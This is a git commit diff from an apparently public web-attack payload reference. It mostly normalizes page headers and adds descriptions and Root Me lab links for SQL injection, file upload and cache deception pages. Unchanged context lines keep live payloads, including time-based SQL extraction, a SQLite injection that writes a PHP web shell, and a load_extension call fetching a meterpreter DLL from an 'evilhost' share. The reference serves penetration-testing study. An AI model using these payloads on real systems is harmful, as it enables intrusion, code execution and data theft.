Normalize page header for SQLi, Upload, Cache Deception

This commit is contained in:
Swissky 2024-11-10 20:49:52 +01:00
parent a338b2f12a
commit 48a4e5c95b
14 changed files with 118 additions and 70 deletions

View File

@ -1,4 +1,6 @@
# Google BigQuery SQL Injection
# Google BigQuery SQL Injection
> Google BigQuery SQL Injection is a type of security vulnerability where an attacker can execute arbitrary SQL queries on a Google BigQuery database by manipulating user inputs that are incorporated into SQL queries without proper sanitization. This can lead to unauthorized data access, data manipulation, or other malicious activities.
## Summary
@ -10,6 +12,7 @@
* [BigQuery Time Based](#bigquery-time-based)
* [References](#references)
## Detection
* Use a classic single quote to trigger an error: `'`
@ -62,6 +65,7 @@ dataset_name.column_name` union all select CAST(@@project_id AS INT64) ORDER BY
* Time based functions does not exist in the BigQuery syntax.
## References
* [BigQuery SQL Injection Cheat Sheet - Ozgur Alp - February 14, 2022](https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac)

View File

@ -2,6 +2,7 @@
> IBM DB2 is a family of relational database management systems (RDBMS) developed by IBM. Originally created in the 1980s for mainframes, DB2 has evolved to support various platforms and workloads, including distributed systems, cloud environments, and hybrid deployments.
## Summary
* [DB2 Cheatsheet](#db2-cheatsheet)

View File

@ -2,6 +2,7 @@
> Hibernate ORM (Hibernate in short) is an object-relational mapping tool for the Java programming language. It provides a framework for mapping an object-oriented domain model to a relational database. - Wikipedia
## Summary
* [HQL Comments](#hql-comments)
@ -15,7 +16,6 @@
* [Methods by DBMS](#methods-by-dbms)
* [References](#references)
:warning: Your input will always be between the percentage symbols: `%INJECT_HERE%`
## HQL Comments

View File

@ -1,5 +1,8 @@
# MSSQL Injection
> MSSQL Injection is a type of security vulnerability that can occur when an attacker can insert or "inject" malicious SQL code into a query executed by a Microsoft SQL Server (MSSQL) database. This typically happens when user inputs are directly included in SQL queries without proper sanitization or parameterization. SQL Injection can lead to serious consequences such as unauthorized data access, data manipulation, and even gaining control over the database server.
## Summary
* [MSSQL Default Databases](#mssql-default-databases)

View File

@ -1,5 +1,8 @@
# MySQL Injection
> MySQL Injection is a type of security vulnerability that occurs when an attacker is able to manipulate the SQL queries made to a MySQL database by injecting malicious input. This vulnerability is often the result of improperly handling user input, allowing attackers to execute arbitrary SQL code that can compromise the database's integrity and security.
## Summary
* [MYSQL Default Databases](#mysql-default-databases)

View File

@ -1,5 +1,8 @@
# Oracle SQL Injection
> Oracle SQL Injection is a type of security vulnerability that arises when attackers can insert or "inject" malicious SQL code into SQL queries executed by Oracle Database. This can occur when user inputs are not properly sanitized or parameterized, allowing attackers to manipulate the query logic. This can lead to unauthorized access, data manipulation, and other severe security implications.
## Summary
* [Oracle SQL Default Databases](#oracle-sql-default-databases)

View File

@ -1,9 +1,12 @@
# PostgreSQL injection
# PostgreSQL Injection
>
## Summary
* [PostgreSQL Comments](#postgresql-comments)
* [PostgreSQL version](#postgresql-version)
* [PostgreSQL Version](#postgresql-version)
* [PostgreSQL Current User](#postgresql-current-user)
* [PostgreSQL List Users](#postgresql-list-users)
* [PostgreSQL List Password Hashes](#postgresql-list-password-hashes)
@ -11,22 +14,23 @@
* [PostgreSQL List Privileges](#postgresql-list-privileges)
* [PostgreSQL Check if Current User is Superuser](#postgresql-check-if-current-user-is-superuser)
* [PostgreSQL database name](#postgresql-database-name)
* [PostgreSQL List databases](#postgresql-list-database)
* [PostgreSQL List tables](#postgresql-list-tables)
* [PostgreSQL List columns](#postgresql-list-columns)
* [PoStgresql List Databases](#postgresql-list-database)
* [PostgreSQL List Tables](#postgresql-list-tables)
* [PostgreSQL List Columns](#postgresql-list-columns)
* [PostgreSQL Error Based](#postgresql-error-based)
* [PostgreSQL XML Helpers](#postgresql-xml-helpers)
* [PostgreSQL Blind](#postgresql-blind)
* [PostgreSQL Time Based](#postgresql-time-based)
* [PostgreSQL Stacked query](#postgresql-stacked-query)
* [PostgreSQL Stacked Query](#postgresql-stacked-query)
* [PostgreSQL File Read](#postgresql-file-read)
* [PostgreSQL File Write](#postgresql-file-write)
* [PostgreSQL Command execution](#postgresql-command-execution)
* [PostgreSQL Command Execution](#postgresql-command-execution)
* [CVE-20199193](#cve-20199193)
* [Using libc.so.6](#using-libcso6)
* [Bypass Filter](#bypass-filter)
* [References](#references)
## PostgreSQL Comments
```sql
@ -34,15 +38,6 @@
/**/
```
## PostgreSQL chain injection points symbols
```sql
; #Used to terminate a SQL command. The only place it can be used within a statement is within a string constant or quoted identifier.
|| #or statement
# usage examples:
/?whatever=1;(select 1 from pg_sleep(5))
/?whatever=1||(select 1 from pg_sleep(5))
```
## PostgreSQL Version
@ -136,7 +131,7 @@ SELECT column_name FROM information_schema.columns WHERE table_name='data_table'
' and 1=cast((SELECT data_column FROM data_table LIMIT 1 OFFSET data_offset) as int) and '1'='1
```
## PostgreSQL XML helpers
## PostgreSQL XML Helpers
```sql
select query_to_xml('select * from pg_user',true,true,''); -- returns all the results as a single xml row
@ -151,6 +146,7 @@ select database_to_xmlschema(true,true,''); -- dump the current db to an XML sch
Note, with the above queries, the output needs to be assembled in memory. For larger databases, this might cause a slow down or denial of service condition.
## PostgreSQL Blind
```sql
@ -160,7 +156,7 @@ Note, with the above queries, the output needs to be assembled in memory. For la
## PostgreSQL Time Based
#### Identify time based
#### Identify Time Based
```sql
select 1 from pg_sleep(5)
@ -168,16 +164,20 @@ select 1 from pg_sleep(5)
||(select 1 from pg_sleep(5))
```
#### Database dump time based
#### Database Dump Time Based
```sql
select case when substring(datname,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from pg_database limit 1
```
#### Table dump time based
#### Table Dump Time Based
```sql
select case when substring(table_name,1,1)='a' then pg_sleep(5) else pg_sleep(0) end from information_schema.tables limit 1
```
#### columns dump time based
#### Columns Dump Time Based
```sql
select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from table_name limit 1
select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from table_name where column_name='value' limit 1
@ -191,12 +191,13 @@ AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
## PostgreSQL Stacked Query
Use a semi-colon ";" to add another query
Use a semi-colon "`;`" to add another query
```sql
http://host/vuln.php?id=injection';create table NotSoSecure (data varchar(200));--
```
## PostgreSQL File Read
```sql
@ -238,7 +239,7 @@ SELECT lo_put(43210, 20, 'some other data'); -- append data to a large object at
SELECT lo_export(43210, '/tmp/testexport'); -- export data to /tmp/testexport
```
## PostgreSQL Command execution
## PostgreSQL Command Execution
### CVE-20199193

View File

@ -1,13 +1,7 @@
# SQL Injection
> A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application.
> SQL Injection (SQLi) is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. SQL Injection is one of the most common and severe types of web application vulnerabilities, enabling attackers to execute arbitrary SQL code on the database. This can lead to unauthorized data access, data manipulation, and, in some cases, full compromise of the database server.
Attempting to manipulate SQL queries may have goals including:
- Information Leakage
- Disclosure of stored data
- Manipulation of stored data
- Bypassing authorization controls
## Summary
@ -21,7 +15,8 @@ Attempting to manipulate SQL queries may have goals including:
* [HQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/HQL%20Injection.md)
* [DB2 Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/DB2%20Injection.md)
* [SQLmap](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLmap%20Cheatsheet.md)
* [Entry point detection](#entry-point-detection)
* [Tools](#tools)
* [Entry Point Detection](#entry-point-detection)
* [DBMS Identification](#dbms-identification)
* [Authentication bypass](#authentication-bypass)
* [Authentication Bypass (Raw MD5 SHA1)](#authentication-bypass-raw-md5-sha1)
@ -33,6 +28,8 @@ Attempting to manipulate SQL queries may have goals including:
* [No Comma Allowed](#no-comma-allowed)
* [No Equal Allowed](#no-equal-allowed)
* [Case modification](#case-modification)
* [Labs](#labs)
* [References](#references)
## Tools
@ -41,7 +38,7 @@ Attempting to manipulate SQL queries may have goals including:
* [r0oth3x49/ghauri](https://github.com/r0oth3x49/ghauri) - An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws
## Entry point detection
## Entry Point Detection
Detecting the entry point in SQL injection (SQLi) involves identifying locations in an application where user input is not properly sanitized before it is included in SQL queries.
@ -358,6 +355,19 @@ Bypass using LIKE/NOT IN/IN/BETWEEN
* [PortSwigger - SQL injection vulnerability allowing login bypass](https://portswigger.net/web-security/sql-injection/lab-login-bypass)
* [PortSwigger - SQL injection with filter bypass via XML encoding](https://portswigger.net/web-security/sql-injection/lab-sql-injection-with-filter-bypass-via-xml-encoding)
* [PortSwigger - SQL Labs](https://portswigger.net/web-security/all-labs#sql-injection)
* [Root Me - SQL injection - Authentication](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-authentication)
* [Root Me - SQL injection - Authentication - GBK](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-authentication-GBK)
* [Root Me - SQL injection - String](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-String)
* [Root Me - SQL injection - Numeric](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-Numeric)
* [Root Me - SQL injection - Routed](https://www.root-me.org/en/Challenges/Web-Server/SQL-Injection-Routed)
* [Root Me - SQL injection - Error](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-Error)
* [Root Me - SQL injection - Insert](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-Insert)
* [Root Me - SQL injection - File reading](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-File-reading)
* [Root Me - SQL injection - Time based](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-Time-based)
* [Root Me - SQL injection - Blind](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-Blind)
* [Root Me - SQL injection - Second Order](https://www.root-me.org/en/Challenges/Web-Server/SQL-Injection-Second-Order)
* [Root Me - SQL injection - Filter bypass](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-Filter-bypass)
* [Root Me - SQL Truncation](https://www.root-me.org/en/Challenges/Web-Server/SQL-Truncation)
## References

View File

@ -1,37 +1,41 @@
# SQLite Injection
> SQLite Injection is a type of security vulnerability that occurs when an attacker can insert or "inject" malicious SQL code into SQL queries executed by an SQLite database. This vulnerability arises when user inputs are integrated into SQL statements without proper sanitization or parameterization, allowing attackers to manipulate the query logic. Such injections can lead to unauthorized data access, data manipulation, and other severe security issues.
## Summary
* [SQLite comments](#sqlite-comments)
* [SQLite version](#sqlite-version)
* [String based - Extract database structure](#string-based---extract-database-structure)
* [Integer/String based - Extract table name](#integerstring-based---extract-table-name)
* [Integer/String based - Extract column name](#integerstring-based---extract-column-name)
* [Boolean - Count number of tables](#boolean---count-number-of-tables)
* [Boolean - Enumerating table name](#boolean---enumerating-table-name)
* [Boolean - Extract info](#boolean---extract-info)
* [Boolean - Error based](#boolean---error-based)
* [Time based](#time-based)
* [SQLite Comments](#sqlite-comments)
* [SQLite Version](#sqlite-version)
* [String Based - Extract Database Structure](#string-based---extract-database-structure)
* [Integer/String Based - Extract Table Name](#integerstring-based---extract-table-name)
* [Integer/String Based - Extract Column Name](#integerstring-based---extract-column-name)
* [Boolean - Count Number Of Tables](#boolean---count-number-of-tables)
* [Boolean - Enumerating Table Name](#boolean---enumerating-table-name)
* [Boolean - Extract Info](#boolean---extract-info)
* [Boolean - Error Based](#boolean---error-based)
* [Time Based](#time-based)
* [Remote Code Execution](#remote-code-execution)
* [Attach Database](#attach-database)
* [Load_extension](#load_extension)
* [References](#references)
## SQLite comments
## SQLite Comments
```sql
--
/**/
```
## SQLite version
## SQLite Version
```sql
select sqlite_version();
```
## String based - Extract database structure
## String Based - Extract Database Structure
```sql
SELECT sql FROM sqlite_schema
@ -40,13 +44,16 @@ if sqlite_version > 3.33.0
```sql
SELECT sql FROM sqlite_master
```
## Integer/String based - Extract table name
## Integer/String Based - Extract Table Name
```sql
SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'
```
## Integer/String based - Extract column name
## Integer/String Based - Extract Column Name
```sql
SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name'
@ -64,37 +71,38 @@ Cleaner output
SELECT GROUP_CONCAT(name) AS column_names FROM pragma_table_info('table_name');
```
## Boolean - Count number of tables
## Boolean - Count Number Of Tables
```sql
and (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ) < number_of_table
```
## Boolean - Enumerating table name
## Boolean - Enumerating Table Name
```sql
and (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset 0)=table_name_length_number
```
## Boolean - Extract info
## Boolean - Extract Info
```sql
and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char')
```
## Boolean - Extract info (order by)
### Boolean - Extract Info (order by)
```sql
CASE WHEN (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) = hex('some_char') THEN <order_element_1> ELSE <order_element_2> END
```
## Boolean - Error based
## Boolean - Error Based
```sql
AND CASE WHEN [BOOLEAN_QUERY] THEN 1 ELSE load_extension(1) END
```
## Time based
## Time Based
```sql
AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
@ -117,7 +125,7 @@ INSERT INTO lol.pwn (dataz) VALUES ("<?php system($_GET['cmd']); ?>");--
UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
```
Note: By default this component is disabled
Note: By default this component is disabled.
## References

View File

@ -1,12 +1,13 @@
# SQLmap
SQLmap is a powerful tool that automates the detection and exploitation of SQL injection vulnerabilities, saving time and effort compared to manual testing. It supports a wide range of databases and injection techniques, making it versatile and effective in various scenarios.
> SQLmap is a powerful tool that automates the detection and exploitation of SQL injection vulnerabilities, saving time and effort compared to manual testing. It supports a wide range of databases and injection techniques, making it versatile and effective in various scenarios.
Additionally, SQLmap can retrieve data, manipulate databases, and even execute commands, providing a robust set of features for penetration testers and security analysts.
> Additionally, SQLmap can retrieve data, manipulate databases, and even execute commands, providing a robust set of features for penetration testers and security analysts.
Reinventing the wheel isn't ideal because SQLmap has been rigorously developed, tested, and improved by experts. Using a reliable, community-supported tool means you benefit from established best practices and avoid the high risk of missing vulnerabilities or introducing errors in custom code.
> Reinventing the wheel isn't ideal because SQLmap has been rigorously developed, tested, and improved by experts. Using a reliable, community-supported tool means you benefit from established best practices and avoid the high risk of missing vulnerabilities or introducing errors in custom code.
>However you should always know how SQLmap is working, and be able to replicate it manually if necessary.
However you should always know how SQLmap is working, and be able to replicate it manually if necessary.
## Summary

View File

@ -6,7 +6,7 @@
## Summary
* [Tools](#tools)
* [Description](#description)
* [Methodology](#methodology)
* [Exploit](#exploit)
* [Discover](#discover)
* [References](#references)
@ -17,7 +17,7 @@
- [PortSwigger/discovering-reversetabnabbing](https://portswigger.net/bappstore/80eb8fd46bf847b4b17861482c2f2a30) - Discovering Reverse Tabnabbing
## Description
## Methodology
When tabnabbing, the attacker searches for links that are inserted into the website and are under his control. Such links may be contained in a forum post, for example. Once he has found this kind of functionality, it checks that the link's `rel` attribute does not contain the value `noopener` and the target attribute contains the value `_blank`. If this is the case, the website is vulnerable to tabnabbing.

View File

@ -2,6 +2,7 @@
> PHP is a loosely typed language, which means it tries to predict the programmer's intent and automatically converts variables to different types whenever it seems necessary. For example, a string containing only numbers can be treated as an integer or a float. However, this automatic conversion (or type juggling) can lead to unexpected results, especially when comparing variables using the '==' operator, which only checks for value equality (loose comparison), not type and value equality (strict comparison).
## Summary
* [Loose Comparison](#loose-comparison)
@ -9,7 +10,8 @@
* [NULL statements](#null-statements)
* [Loose Comparison](#loose-comparison)
* [Magic Hashes](#magic-hashes)
* [Exploit](#exploit)
* [Methodology](#methodology)
* [Labs](#labs)
* [References](#references)
@ -89,7 +91,7 @@ var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m'));
?>
```
## Exploit
## Methodology
The vulnerability in the following code lies in the use of a loose comparison (!=) to validate the $cookie['hmac'] against the calculated `$hash`.
@ -140,6 +142,11 @@ The exploitation phase is the following:
4. In this case we assumed the key was a null string : `$key = '';`
## Labs
* [Root Me - PHP - type juggling](https://www.root-me.org/en/Challenges/Web-Server/PHP-type-juggling)
## References
- [(Super) Magic Hashes - myst404 (@myst404_) - October 7, 2019](https://offsec.almond.consulting/super-magic-hash.html)

View File

@ -2,10 +2,11 @@
> Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.
## Summary
* [Tools](#tools)
* [Exploits](#exploits)
* [Methodology](#methodology)
* [Defaults extensions](#defaults-extensions)
* [Upload tricks](#upload-tricks)
* [Filename vulnerabilities](#filename-vulnerabilities)
@ -14,6 +15,7 @@
* [Configuration Files](#configuration-files)
* [CVE - ImageMagick](#cve---imagemagick)
* [CVE - FFMpeg HLS](#cve---ffmpeg-hls)
* [Labs](#labs)
* [References](#references)
@ -24,7 +26,7 @@
- [ZAP/FileUpload](https://www.zaproxy.org/blog/2021-08-20-zap-fileupload-addon/) - OWASP ZAP add-on for finding vulnerabilities in File Upload functionality.
## Exploits
## Methodology
![file-upload-mindmap.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/Upload%20Insecure%20Files/Images/file-upload-mindmap.png?raw=true)
@ -290,7 +292,12 @@ More payloads in the folder `CVE FFmpeg HLS/`.
## Labs
* [Portswigger Labs on File Uploads](https://portswigger.net/web-security/all-labs#file-upload-vulnerabilities)
* [PortSwigger - Labs on File Uploads](https://portswigger.net/web-security/all-labs#file-upload-vulnerabilities)
* [Root Me - File upload - Double extensions](https://www.root-me.org/en/Challenges/Web-Server/File-upload-Double-extensions)
* [Root Me - File upload - MIME type](https://www.root-me.org/en/Challenges/Web-Server/File-upload-MIME-type)
* [Root Me - File upload - Null byte](https://www.root-me.org/en/Challenges/Web-Server/File-upload-Null-byte)
* [Root Me - File upload - ZIP](https://www.root-me.org/en/Challenges/Web-Server/File-upload-ZIP)
* [Root Me - File upload - Polyglot](https://www.root-me.org/en/Challenges/Web-Server/File-upload-Polyglot)
## References

View File

@ -6,7 +6,7 @@
## Summary
* [Tools](#tools)
* [Exploit](#exploit)
* [Methodology](#methodology)
* [Caching Sensitive Data](#caching-sensitive-data)
* [Caching Custom JavaScript](#caching-custom-javascript)
* [CloudFlare Caching](#cloudflare-caching)
@ -19,7 +19,7 @@
* [PortSwigger/param-miner](https://github.com/PortSwigger/param-miner) - Web Cache Poisoning Burp Extension
## Exploit
## Methodology
Example of Web Cache Deception:
@ -127,7 +127,7 @@ Exceptions and bypasses:
## Labs
* [PortSwigger Labs for Web cache deception](https://portswigger.net/web-security/all-labs#web-cache-poisoning)
* [PortSwigger Labs for Web Cache Deception](https://portswigger.net/web-security/all-labs#web-cache-poisoning)
## References